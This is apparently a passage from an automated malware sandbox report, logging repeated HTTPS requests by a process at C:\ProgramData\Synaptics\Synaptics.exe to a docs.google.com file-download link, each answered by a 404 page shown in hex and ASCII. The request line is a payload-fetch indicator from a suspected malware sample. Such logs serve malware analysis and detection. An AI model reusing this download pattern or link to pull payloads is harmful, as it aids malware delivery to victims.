                                                                                                                                                                                        2022-05-17 11:31:57 UTC639INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:57 UTC640INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        211192.168.2.349986142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:57 UTC637OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:57 UTC640INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:57 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-hJn5AOJ7TgyNA7gEfDg1NA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:57 UTC641INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:57 UTC641INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 33 5a 7a 45 35 43 78 34 49 57 6f 44 58 54 61 47 48 4e 69 4f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="j3ZzE5Cx4IWoDXTaGHNiOg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:57 UTC642INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:57 UTC643INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        212192.168.2.349987142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:57 UTC640OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:57 UTC643INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:57 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-XVZOlPjVvoI4jsFUipi6Nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:57 UTC644INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:57 UTC644INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 64 6e 63 61 53 44 36 61 63 75 72 44 43 31 70 32 79 6f 74 76 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ddncaSD6acurDC1p2yotvQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:57 UTC645INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:57 UTC646INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        213192.168.2.349988142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:57 UTC643OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:58 UTC646INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:58 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-idteusqGZ8DN7qyfSd/XrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:58 UTC647INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:58 UTC647INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 4a 6e 38 72 6e 56 6e 34 68 48 5a 6e 64 2f 39 47 59 59 43 2f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JJn8rnVn4hHZnd/9GYYC/w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:58 UTC648INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:58 UTC649INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        214192.168.2.349989142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:58 UTC646OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:58 UTC649INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:58 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ZleZ6WbxflVe+6JU1IFmCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:58 UTC650INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:58 UTC650INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 58 64 4b 75 37 39 74 59 77 6d 36 5a 4f 2f 50 4c 39 77 77 53 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZXdKu79tYwm6ZO/PL9wwSA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:58 UTC651INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:58 UTC652INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        215192.168.2.349990142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:58 UTC649OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:58 UTC652INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:58 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tMmUfs9Ph7/bNMjKASvvTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:58 UTC653INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 61 44 67 39 4e 48 2f 74 76 6c 62 4e 37 7a 59 4b 72 74 4c 49 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
